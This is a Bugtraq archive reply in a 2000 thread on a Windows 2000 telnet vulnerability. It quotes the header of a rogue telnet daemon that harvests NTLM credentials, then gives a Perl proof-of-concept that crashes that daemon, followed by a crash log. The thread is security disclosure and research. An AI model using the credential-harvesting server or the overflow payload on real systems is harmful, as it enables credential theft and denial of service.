Bugtraq mailing list archives
Re: Win2k Telnet.exe malicious server vulnerability
From: Jim Paris <jim () JTAN COM>
Date: Thu, 14 Sep 2000 12:04:09 -0400
/* NTLM telnetD v0.8 Snarfs NTLM challenge/response by convincing w2k telnet client to auto-authenticate. Outputs auth-data in LophtCrack sniff format on stdout. compile: gcc -o w2kteld ntlm_telnetd.c run: ./w2kteld Then wait for w2k to telnet to you. for the impatient, there are always ways of making w2k telnet!
... <snip> And if you happen to get bitten by this rogue server, it must be time for a friendly little DoS against it. (rp->upos is used as a pointer modifier without checking its bounds) sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl ) [1] 23535 [ Fake NTLM Telnet Daemon - by yeza ] Listening on port 1234 Awaiting connections Connection from: 127.0.0.1 Got NTLM response token [1]+ Segmentation fault ./ntlm_telnetd -l 1234 sardegna:~$ We are so batman. And now I'm late for class. (grr, 6.003) -jim #!/usr/bin/perl -w # # anti-ntlm-telnetd by jim@jtan use IO::Socket; my($s, $msg); $s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die; $s->recv($msg,1024); $s->send("\xff\xfb\x25"); $s->recv($msg,1024); $s->send("\xff\xfd"); $s->send("A"x7 . # foo "\xFF" . # length (passed to gettoken) "A"x7 . # bar "NTLMSSP\0\x03" . # protocol and type "A"x29 . # baz "\xDE\xAD\xBE\xEF"); # rp->upos
Current thread:
- Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
- Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)